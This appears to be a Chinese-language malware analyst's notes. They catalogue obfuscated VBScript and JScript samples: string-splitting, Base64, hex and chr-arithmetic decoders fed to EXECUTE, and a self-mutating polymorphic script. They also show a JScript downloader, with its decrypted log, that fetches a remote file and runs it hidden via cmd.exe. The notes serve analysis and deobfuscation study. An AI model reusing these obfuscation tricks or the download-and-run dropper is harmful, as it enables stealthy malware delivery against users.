VBS
1.—————–
H2K = "39#+0*z60#34..略.."
H2K = SPLIT(H2K,"#+0*z")
FOR I = 0 TO UBOUND(H2K) -1
ANA = ANA & CHR(H2K(I))
NEXT
EXECUTE (ANA)
2.————-
xmen = DeCrypT(StrReverse("==gbvlGdj5..略.."))
EXECUTE (xmen)
Function DeCrypT(data)
Base64Decode 解密 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
end function
--------------
M=T("9pnR879bOsu..略..=")
:ExecuteGlobal(M)
:function T(P)
:T=Q(P)
:end function
:Dim F,O,G,N,C,V,B,J
:Function Q(ByVal U)
:Const D="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"
:U=Replace(U,vbCrLf,"")
:U=Replace(U,vbTab,"")
:U=Replace(U," ","")
:F=Len(U)
:If F Mod 4<>0 Then Err.Raise 1,"Base64Decode","Bad Base64 string."
:Exit Function
:End If
:For G=1 To F Step 4
:N=3
:J=0
:For C=0 To 3
:V=Mid(U,G+C,1)
:If V="="Then N=N-1
:B=0
:Else B=InStr(1,D,V,vbBinaryCompare)-1
:End If:If B=-1 Then Err.Raise 2,"Base64Decode","Bad character In Base64 string."
:Exit Function
:End If
:J=64*J+B
:Next
:J=Hex(J)
:J=String(6-Len(J),"0")&J
:O=O&Left(Chr(CByte("&H"&Mid(J,1,2)))+Chr(CByte("&H"&Mid(J,3,2)))+Chr(CByte("&H"&Mid(J,5,2))),N)
:Next
:Q=O
:End Function
3.———–ee4e62eea4c4262f47e64bb4b4b9d018
str = str & ContinueServerCommand("3932..略..") & VbCrLf ;
str = str & ContinueServerCommand("3532..略..") & VbCrLf
..略..
Function ContinueServerCommand(str)
Dim KeyPos
KeyPos=""
a=Split(str,"76??<0<HTC>3>??92")
for each x in a
KeyPos = KeyPos & Chr(x)
next
ContinueServerCommand = KeyPos & VbCrLf
End Function
4.———–36a42fcd07cedaaec4ccfb3af2f75b00
a=0
b=a+1
c=b+b
d=c+b
e=c+c
f=e+b
w=w&d&j&k&g&a&k&j&b&d
w=w&k&g&b&k&e&f&k&g&b&k&e&f&k&g&b&k&e
..略..
r="chr("
t=")&"
l="l="
o=l&r&b&b&j&t&r&g&b&t&r&i&d&t&r&i
o=o&r&b&a&b&t&r&j&j&t&r&b&b&h&t&r&b&b&g&t&r&b&")"&":execute(l)"
execute(o)
5.———–44ecf71df419657eca650d49a493fed9
DcoIos = (("DYx=弬€寔倧=W=厡拋唻?E€F=悎枍?W=厡拋唻咼儠=z[*'*'DZJZJZJZJZ=€寢儐?ZJZJZJZJZJZJ"))
CaCKjAd()
Function CaCKjAd()
For i = 1 to icdjsCsaaSdC(DcoIos)
idakddaaZiolAdC = idakddaaZiolAdC & ((CHRW(ASC((MID(DcoIos, i))) - ASC(""))))
next
executeglobal idakddaaZiolAdC
End Function
Function icdjsCsaaSdC(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
icdjsCsaaSdC = i
Loop While sStr <> bLen
End Function
6———–4314b826a57c9aa89449cbc798b9ad6a—-
ExecuteGlobal (chr( -7016+7055 ) & chr( 5855-5795 ) & chr( 274729/3019 ) ..略.. & vbcrlf )
7———-00be582eaf135d2f451df63d4045c158—-
Safa7_22 ="273C5B207265636F646572203A20686F..略.."
DZ = hextoByte(safa7_22)
EXECUTE (DZ)
Function hextoByte(sData)
For i = 1 To Len(sData) Step 2
hextoByte = hextoByte & Chr("&h" & Mid(sData, i, 2))
Next
End Function
8————-3509431b942232f5c50863baaa02d900(boyfine1)
;暴風1號的註釋卻是變形後的代碼
exECuTE("seT e466 = CREaTeoBJECT(""sCRipting.FIleSYStEmObJeCT"")
:Set f8b6=E466.OpENTeXtFILe(WsCRIPT.ScriPtFuLlNAmE,1)
:dO uNtIl f8B6.aTENdofsTreAM
:ccd4=Trim(f8b6.rEAdLine)
:iF LEfT(ccD4,1)=""'"" theN
:C169=A97B(MId(CcD4,2,lEn(ccD4)-2),RigHt(CcD4,1))
:rANDoMiZe:AFB1=InT(8*rNd+2)
:A4ae=""'""&A97b(c169,AFB1)&aFB1
:ElSE
:a4aE=ccD4:a4aE=Af7C(A4ae)
:a4aE=Dd72(a4ae):end iF:fA6d=fa6D&C169&VBCrLF:B056=B056&a4AE&vBCRlf
:c169="""":a4ae="""":lOoP
:set f8B6=E466.OpeNteXTFiLe(WscRipT.sCriptFuLLNAmE,2)
:F8B6.wriTE B056:F8B6.CLOsE
:Set e466=nOTHiNg
:dIm fsO,f:set fsO = CrEateObJeCt(""ScRiPtIng.fiLeSystemoBjECT"")
:SeT F = fSO.creaTeTexTfiLE(""jIeXI1.tXt"", trUe):F.wRItE(fa6D)
:F.WRIteBLaNklINeS(3) :F.CLOSE():SEt F = noTHINg:seT FSo = nOTHiNg
:fUnctiON a97B(EBe2,AFB1):FOr Eb91=1 tO LEN(EbE2) sTeP afb1
:A97b=A97b+sTRReversE(mid(ebe2,eB91,AfB1)):NEXT:EnD fUNCTiOn:fUnCTioN dD72(EbE2)
:RandOmize:fOr EB91=1 to LeN(eBe2):b2e4=MID(ucaSe(eBE2),Eb91,1):iF int(rND*2) Then
:b2e4=lCaSE(b2E4):eND IF:dd72=DD72&b2E4:NexT:end FUnCTioN:fuNCtIon af7C(EBE2)
:rAnDoMIzE:fOR eB91=0 To 13:EbE2=rePLACE(uCaSe(EBE2),uCASE(hEx(&hE466+eb91)),Ucase(HeX(iNt(RND*24000+40960)+eB91)))
:nEXt:AF7c=eBe2:ENd FUnCTIon")
9.在上面的幾行(用”:”連接只有一行)前後添加n多註釋.
JS
10————js腳本———
var kqyxuz = "e;"
var tofla = "Ope"
var upugryf = ":\\"
var uffytr = "m.u"
..略..
var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
if (['dm', 'o', new Function(['e', ebylx, 'u', 'f'][1] + [gosax, 'b'][0] )()][2]) {
hneneqil0 = this[['mt', 'u', zrypy, 'e'][2] + ['i', offotw, 'w'][1] + ['y', 'h', ficy, 'y'][2]];
istudyd7 = hneneqil0[['hl', anqabyb][1] + ['sn', ohapzy, 'jr'][1] );
}10
通過數組和拼接前面的變量進行代碼解密,推測有分割引擎.
----------------------------------------------------------------
var fso = new ActiveXObject("Scripting.FileSystemObject");
if (1) {
var fsd = this["WScript"];
fsobj = new ActiveXObject("Scripting.FileSystemObject");
WshSell = WScript.CreateObject("WScript.Shell");
xmlHTTP = WScript.CreateObject("MSXML2.XMLHTTP");
adodbStream = WScript.CreateObject("ADODB.stream");
ihyxu0 = fsobj.GetSpecialFolder(2);
ubujile0 = fsobj.GetTempName();
fxejoplod6 = xmlHTTP.open("Get","http://uwoArtPic%2F201p%3D0.jpg",0);
fxejoplod6 = xmlHTTP.send();
adodbStream.type = 1;
avolcuc7 = xmlHTTP.RespseBody;
hnoqasann0 = WScript.ScriptFullName;
fxejoplod6 = adodbStream.Open();
fxejoplod6 = adodbStream.Write(avolcuc7);
fxejoplod6 = adodbStream.SaveToFile("C:\WindowsPVTdog.jpg");
fxejoplod6 = adodbStream.Close();
WshSell.Run("cmd.exe /c C:\WindowsPVTdog.jpg",0)
}10
調試
11.js/vbs 腳本的調試(vs2013):WScript.exe /x name.js/vbs
12.解密後的代碼寫入log文件.
Dim fso,f
set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.CreateTextFile("C:\Users\Administrator\Desktop\python\Dunihi\45bbded4ed2a177ff6f09e86a5f3b975_jiexi1.txt", true) '第二個參數表示目標文件存在時是否覆蓋
f.Write(M)
f.WriteBlankLines(3)
f.Close()
set f = nothing
set fso = nothing
f.Write(L);
f.WriteBlankLines(2) ;
var fso=new ActiveXObject(Scripting.FileSystemObject);
var f = fso.CreateTextFile("C:\Users\Administrator\Desktop\28jsjiexi.txt", true);
-------------log文件----------------------
hneneqil0 = this[WScript]
istudyd7 = hneneqil0[CreateObject](Scripting.FileSystemObject)
lysfopdep3 = hneneqil0[CreateObject](WScript.Shell)
woqvybd3 = hneneqil0[CreateObject](MSXML2.XMLHTTP)
jucyzmum2 = hneneqil0[CreateObject](ADODB.Stream)
deskPath = istudyd7[GetSpecialFolder](0)
ubujile0 = istudyd7[GetTempName]()
fxejoplod6 = woqvybd3[open](GET,http://img.bizhi.sogou.com/images/2015/01/20/1053165.jpg?f=download,0)
fxejoplod6 = woqvybd3[send]()
jucyzmum2[type] = 1
avolcuc7 = woqvybd3[ResponseBody]
hnoqasann0 = hneneqil0[ScriptFullName]
fxejoplod6 = jucyzmum2[Open]()
fxejoplod6 = jucyzmum2[Write]()
fxejoplod6 = jucyzmum2[SaveToFile](C:\WindowsRB9dog.jpg)
fxejoplod6 = jucyzmum2[Close]()
fxejoplod6 = lysfopdep3[run](cmd.exe /c C:\WindowsRB9dog.jpg,0)
附件:js下載器改寫的圖片下載器(並打印代碼),用來更換壁紙.
